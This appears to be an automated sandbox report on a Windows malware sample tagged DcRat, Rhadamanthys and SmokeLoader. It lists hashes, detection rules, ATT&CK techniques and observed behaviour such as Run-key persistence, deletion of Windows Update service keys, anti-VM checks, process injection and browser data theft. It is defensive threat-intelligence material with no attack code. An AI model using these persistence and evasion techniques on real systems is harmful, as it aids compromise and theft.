dcrat | f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec

Analysis

max time kernel
84s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
25-02-2023 17:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
Size

252KB
MD5

4c321bea573c9d741d073aee4280af7d
SHA1

57f6df6d4b8b0c1e093c96aa88177582cd75b59a
SHA256

f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec
SHA512

eb06034eda2e0871b66f9f588c1243d52e74d8315a1a4cb245d41868ba2f13d7933a9c0114c635b73a7625c4c4e2e5ce1b9b41affb17a3cae34e7063ecd62aca
SSDEEP

3072:hAxkekLAFD6gK/32/dJhN3rvg/7/E8argeVTtXPpxBqRhDmlhHo:KOLTgK/4ogrxPXBq7mL

Score

10^/10

dcrat rhadamanthys smokeloader agilenet backdoor evasion infostealer persistence rat spyware stealer themida trojan

Malware Config

Signatures

DcRat 3 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

Processes:

schtasks.exeschtasks.exef255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe

pid	process
4672	schtasks.exe
5040	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe

Detect rhadamanthys stealer shellcode 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1396-410-0x00000000021B0000-0x00000000021CC000-memory.dmp	family_rhadamanthys
behavioral1/memory/1396-413-0x00000000021B0000-0x00000000021CC000-memory.dmp	family_rhadamanthys
behavioral1/memory/1396-414-0x00000000021D0000-0x00000000021EA000-memory.dmp	family_rhadamanthys
behavioral1/memory/1396-451-0x00000000021B0000-0x00000000021CC000-memory.dmp	family_rhadamanthys

Detects Smokeloader packer 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2304-134-0x00000000048D0000-0x00000000048D9000-memory.dmp	family_smokeloader

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

tmp40FB.tmpmomuxluwyocb.exeWinUpdate.exe

description	pid	process	target process
PID 3876 created 3164	3876	tmp40FB.tmpmomuxluwyocb.exe	Explorer.EXE
PID 3876 created 3164	3876	tmp40FB.tmpmomuxluwyocb.exe	Explorer.EXE
PID 3876 created 3164	3876	tmp40FB.tmpmomuxluwyocb.exe	Explorer.EXE
PID 3876 created 3164	3876	tmp40FB.tmpmomuxluwyocb.exe	Explorer.EXE
PID 3964 created 3164	3964	WinUpdate.exe	Explorer.EXE

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

988.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 988.exe
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	988.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral1/memory/216-175-0x0000000000100000-0x0000000000290000-memory.dmp	net_reactor
behavioral1/memory/3744-183-0x0000000000640000-0x0000000000BD2000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

988.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	988.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	988.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

988.exe282.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	988.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	282.exe

Executes dropped EXE 8 IoCs

Processes:

ED43.exeF60E.exe282.exe988.exetmp40FB.tmpmomuxluwyocb.exetmp40FC.tmptucb6auv258.exeWinUpdate.exeInfrastructureprotection.exe

pid	process
3948	ED43.exe
1396	F60E.exe
216	282.exe
3744	988.exe
3876	tmp40FB.tmpmomuxluwyocb.exe
4928	tmp40FC.tmptucb6auv258.exe
3964	WinUpdate.exe
4968	Infrastructureprotection.exe

Obfuscated with Agile.Net obfuscator 8 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
behavioral1/memory/3744-189-0x0000000000640000-0x0000000000BD2000-memory.dmp	agile_net
C:\Users\Admin\AppData\Local\Temp\tmp40FC.tmptucb6auv258.exe	agile_net
C:\Users\Admin\AppData\Local\Temp\tmp40FC.tmptucb6auv258.exe	agile_net
C:\Users\Admin\AppData\Local\Temp\tmp40FC.tmptucb6auv258.exe	agile_net
behavioral1/memory/4928-479-0x0000000000140000-0x0000000000150000-memory.dmp	agile_net
behavioral1/memory/3744-480-0x0000000000640000-0x0000000000BD2000-memory.dmp	agile_net
C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exe	agile_net
C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exe	agile_net

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\988.exe	themida
C:\Users\Admin\AppData\Local\Temp\988.exe	themida
behavioral1/memory/3744-189-0x0000000000640000-0x0000000000BD2000-memory.dmp	themida
behavioral1/memory/3744-480-0x0000000000640000-0x0000000000BD2000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

tmp40FC.tmptucb6auv258.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Infrastructure protection v3.39 = "C:\\Users\\Admin\\AppData\\Local\\Infrastructure protection v3.39\\Infrastructureprotection.exe"	tmp40FC.tmptucb6auv258.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

988.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 988.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

99 ip-api.com
101 icanhazip.com
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

988.exeF60E.exe

pid process

3744 988.exe
1396 F60E.exe
1396 F60E.exe
1396 F60E.exe
Drops file in Program Files directory 1 IoCs

Processes:

tmp40FB.tmpmomuxluwyocb.exe

description ioc process

File created C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe tmp40FB.tmpmomuxluwyocb.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

2264 sc.exe
3332 sc.exe
2556 sc.exe
1064 sc.exe
4948 sc.exe
4696 sc.exe
1216 sc.exe
1512 sc.exe
4992 sc.exe
1324 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4976 1396 WerFault.exe F60E.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	988.exe

flow	ioc
99	ip-api.com
101	icanhazip.com

pid	process
3744	988.exe
1396	F60E.exe
1396	F60E.exe
1396	F60E.exe

description	ioc	process
File created	C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe	tmp40FB.tmpmomuxluwyocb.exe

pid	process
2264	sc.exe
3332	sc.exe
2556	sc.exe
1064	sc.exe
4948	sc.exe
4696	sc.exe
1216	sc.exe
1512	sc.exe
4992	sc.exe
1324	sc.exe

pid	pid_target	process	target process
4976	1396	WerFault.exe	F60E.exe

Checks SCSI registry key(s) 3 TTPs 8 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exeF60E.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	F60E.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	F60E.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	F60E.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	F60E.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	F60E.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

tmp40FC.tmptucb6auv258.exeInfrastructureprotection.exe988.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	tmp40FC.tmptucb6auv258.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Infrastructureprotection.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Infrastructureprotection.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	988.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	988.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	988.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	988.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	tmp40FC.tmptucb6auv258.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4672 schtasks.exe
5040 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

916 timeout.exe

pid	process
4672	schtasks.exe
5040	schtasks.exe

pid	process
916	timeout.exe

Modifies data under HKEY_USERS 46 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exeExplorer.EXE

pid	process
2304	f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
2304	f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3164 Explorer.EXE

pid	process
3164	Explorer.EXE

Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exeExplorer.EXE

pid	process
2304	f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Explorer.EXE988.exe282.exemsiexec.exeF60E.exetmp40FC.tmptucb6auv258.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeDebugPrivilege	3744	988.exe
Token: SeDebugPrivilege	216	282.exe
Token: SeSecurityPrivilege	4084	msiexec.exe
Token: SeShutdownPrivilege	1396	F60E.exe
Token: SeCreatePagefilePrivilege	1396	F60E.exe
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeDebugPrivilege	4928	tmp40FC.tmptucb6auv258.exe
Token: SeDebugPrivilege	3048	powershell.exe
Token: SeDebugPrivilege	4284	powershell.exe
Token: SeIncreaseQuotaPrivilege	4284	powershell.exe
Token: SeSecurityPrivilege	4284	powershell.exe
Token: SeTakeOwnershipPrivilege	4284	powershell.exe
Token: SeLoadDriverPrivilege	4284	powershell.exe
Token: SeSystemProfilePrivilege	4284	powershell.exe
Token: SeSystemtimePrivilege	4284	powershell.exe
Token: SeProfSingleProcessPrivilege	4284	powershell.exe
Token: SeIncBasePriorityPrivilege	4284	powershell.exe
Token: SeCreatePagefilePrivilege	4284	powershell.exe
Token: SeBackupPrivilege	4284	powershell.exe
Token: SeRestorePrivilege	4284	powershell.exe
Token: SeShutdownPrivilege	4284	powershell.exe
Token: SeDebugPrivilege	4284	powershell.exe
Token: SeSystemEnvironmentPrivilege	4284	powershell.exe
Token: SeRemoteShutdownPrivilege	4284	powershell.exe
Token: SeUndockPrivilege	4284	powershell.exe
Token: SeManageVolumePrivilege	4284	powershell.exe
Token: 33	4284	powershell.exe
Token: 34	4284	powershell.exe
Token: 35	4284	powershell.exe
Token: 36	4284	powershell.exe
Token: SeIncreaseQuotaPrivilege	4284	powershell.exe
Token: SeSecurityPrivilege	4284	powershell.exe
Token: SeTakeOwnershipPrivilege	4284	powershell.exe
Token: SeLoadDriverPrivilege	4284	powershell.exe
Token: SeSystemProfilePrivilege	4284	powershell.exe
Token: SeSystemtimePrivilege	4284	powershell.exe
Token: SeProfSingleProcessPrivilege	4284	powershell.exe
Token: SeIncBasePriorityPrivilege	4284	powershell.exe
Token: SeCreatePagefilePrivilege	4284	powershell.exe
Token: SeBackupPrivilege	4284	powershell.exe
Token: SeRestorePrivilege	4284	powershell.exe
Token: SeShutdownPrivilege	4284	powershell.exe
Token: SeDebugPrivilege	4284	powershell.exe
Token: SeSystemEnvironmentPrivilege	4284	powershell.exe
Token: SeRemoteShutdownPrivilege	4284	powershell.exe
Token: SeUndockPrivilege	4284	powershell.exe
Token: SeManageVolumePrivilege	4284	powershell.exe
Token: 33	4284	powershell.exe
Token: 34	4284	powershell.exe
Token: 35	4284	powershell.exe
Token: 36	4284	powershell.exe
Token: SeIncreaseQuotaPrivilege	4284	powershell.exe
Token: SeSecurityPrivilege	4284	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Explorer.EXE988.exetmp40FC.tmptucb6auv258.execmd.execmd.exe

description	pid	process	target process
PID 3164 wrote to memory of 3948	3164	Explorer.EXE	ED43.exe
PID 3164 wrote to memory of 3948	3164	Explorer.EXE	ED43.exe
PID 3164 wrote to memory of 1396	3164	Explorer.EXE	F60E.exe
PID 3164 wrote to memory of 1396	3164	Explorer.EXE	F60E.exe
PID 3164 wrote to memory of 1396	3164	Explorer.EXE	F60E.exe
PID 3164 wrote to memory of 216	3164	Explorer.EXE	282.exe
PID 3164 wrote to memory of 216	3164	Explorer.EXE	282.exe
PID 3164 wrote to memory of 3744	3164	Explorer.EXE	988.exe
PID 3164 wrote to memory of 3744	3164	Explorer.EXE	988.exe
PID 3164 wrote to memory of 3744	3164	Explorer.EXE	988.exe
PID 3164 wrote to memory of 3676	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 3676	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 3676	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 3676	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 3408	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 3408	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 3408	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 3972	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 3972	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 3972	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 3972	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 2568	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 2568	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 2568	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 4984	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 4984	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 4984	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 4984	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 5012	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 5012	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 5012	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 5012	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 1176	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 1176	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 1176	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 1176	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 1680	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 1680	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 1680	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 4584	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 4584	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 4584	3164	Explorer.EXE	explorer.exe
PID 3164 wrote to memory of 4584	3164	Explorer.EXE	explorer.exe
PID 3744 wrote to memory of 3876	3744	988.exe	tmp40FB.tmpmomuxluwyocb.exe
PID 3744 wrote to memory of 3876	3744	988.exe	tmp40FB.tmpmomuxluwyocb.exe
PID 3744 wrote to memory of 4928	3744	988.exe	tmp40FC.tmptucb6auv258.exe
PID 3744 wrote to memory of 4928	3744	988.exe	tmp40FC.tmptucb6auv258.exe
PID 4928 wrote to memory of 4356	4928	tmp40FC.tmptucb6auv258.exe	cmd.exe
PID 4928 wrote to memory of 4356	4928	tmp40FC.tmptucb6auv258.exe	cmd.exe
PID 4356 wrote to memory of 916	4356	cmd.exe	timeout.exe
PID 4356 wrote to memory of 916	4356	cmd.exe	timeout.exe
PID 4920 wrote to memory of 4948	4920	cmd.exe	sc.exe
PID 4920 wrote to memory of 4948	4920	cmd.exe	sc.exe
PID 4920 wrote to memory of 2264	4920	cmd.exe	sc.exe
PID 4920 wrote to memory of 2264	4920	cmd.exe	sc.exe
PID 4920 wrote to memory of 4696	4920	cmd.exe	sc.exe
PID 4920 wrote to memory of 4696	4920	cmd.exe	sc.exe
PID 4920 wrote to memory of 1216	4920	cmd.exe	sc.exe
PID 4920 wrote to memory of 1216	4920	cmd.exe	sc.exe
PID 4920 wrote to memory of 1512	4920	cmd.exe	sc.exe
PID 4920 wrote to memory of 1512	4920	cmd.exe	sc.exe
PID 4920 wrote to memory of 1704	4920	cmd.exe	reg.exe
PID 4920 wrote to memory of 1704	4920	cmd.exe	reg.exe
PID 4920 wrote to memory of 1392	4920	cmd.exe	reg.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3164

